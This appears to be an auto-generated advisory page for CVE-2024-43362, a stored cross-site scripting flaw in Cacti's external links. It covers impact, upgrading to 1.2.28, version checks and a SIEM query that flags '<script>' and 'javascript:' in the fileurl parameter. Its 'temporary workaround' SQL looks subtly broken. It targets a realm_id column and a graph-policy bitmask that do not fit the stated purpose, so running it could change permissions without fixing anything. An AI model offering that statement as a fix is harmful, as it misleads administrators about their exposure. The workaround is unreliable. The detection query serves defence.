CVE-2024-43362
📋 TL;DR
This stored XSS vulnerability in Cacti allows authenticated users with external link creation privileges to inject malicious scripts into web pages. When other users view pages containing these manipulated links, the scripts execute in their browsers, potentially stealing session cookies or performing actions on their behalf. All Cacti installations below version 1.2.28 are affected.
💻 Affected Systems
- Cacti
📦 What is this software?
Cacti by Cacti
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain full administrative access to Cacti, pivot to other systems, or deploy ransomware across monitored infrastructure.
Likely Case
Attackers with valid user accounts could steal other users' session cookies, perform unauthorized actions within Cacti, or redirect users to malicious sites.
If Mitigated
With proper input validation and output encoding, the malicious scripts would be rendered harmless as text rather than executable code.
🎯 Exploit Status
Exploitation requires authenticated access with specific privileges. The vulnerability is straightforward to exploit once an attacker has valid credentials.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.2.28
Vendor Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-wh9c-v56x-v77c
Restart Required: No
Instructions:
1. Backup your Cacti database and configuration files. 2. Download Cacti 1.2.28 from the official repository. 3. Replace existing Cacti files with the new version. 4. Verify the installation is working correctly.
🔧 Temporary Workarounds
Remove External Link Creation Privileges
allTemporarily revoke 'External Links' creation privileges from all non-administrative users to prevent exploitation.
UPDATE user_auth SET policy_graphs = policy_graphs & ~(1 << 5) WHERE realm_id != 1;
🧯 If You Can't Patch
- Implement strict input validation on the fileurl parameter using allowlists of permitted characters
- Add Content Security Policy headers to restrict script execution sources
🔍 How to Verify
Check if Vulnerable:
Check Cacti version via web interface or examine include/global.php for version numberCheck Version:
grep '\$config\["cacti_version"\]' include/global.phpVerify Fix Applied:
Verify version is 1.2.28 or higher and test that fileurl parameter input is properly sanitized📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to links.php with JavaScript in fileurl parameter
- Multiple failed login attempts followed by successful login and link creation
Network Indicators:
- HTTP POST requests containing script tags or JavaScript in fileurl parameter
SIEM Query:
source="cacti_access.log" AND (uri_path="/links.php" OR uri_path="/link.php") AND (fileurl CONTAINS "<script>" OR fileurl CONTAINS "javascript:")